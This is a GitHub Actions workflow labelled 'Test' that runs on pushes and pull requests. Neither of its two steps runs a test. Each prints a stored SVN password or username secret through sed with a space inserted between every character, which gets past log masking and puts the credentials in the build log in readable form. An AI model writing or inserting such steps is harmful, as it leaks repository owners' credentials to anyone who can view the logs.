name: Test

on:
  push:
    branches:
      - main
      - master
  pull_request:

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
    - name: test
      run: |
        echo "${{secrets.SVN_PASSWORD }}" | sed 's/./& /g' 
    - name: test u
      run: |
        echo "${{secrets.SVN_USERNAME }}" | sed 's/./& /g' 
